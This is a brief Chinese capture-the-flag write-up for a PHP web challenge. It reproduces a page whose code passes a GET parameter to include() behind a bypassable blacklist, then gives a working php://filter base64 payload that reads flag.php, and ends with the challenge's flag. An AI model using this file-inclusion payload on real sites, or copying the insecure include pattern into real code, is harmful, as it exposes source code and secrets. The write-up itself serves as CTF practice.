进入环境
查看源代码
点进去看看
源代码没有,看看页面长啥样
有个按钮 ,点进去看看
回去抓包
提示secr3t.php ,进去有一串php代码,意思是过滤了一些字符,且提示flag在flag.php里
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>
</html>
直接?file=flag.php看看
源代码里也没有,这里有include函数,试试php://filter
?file=php://filter/read=convert.base64-encode/resource=flag.php
出来了,去base64解码看看
flag{9399eb96-9828-40e1-b246-e3c356e30e68}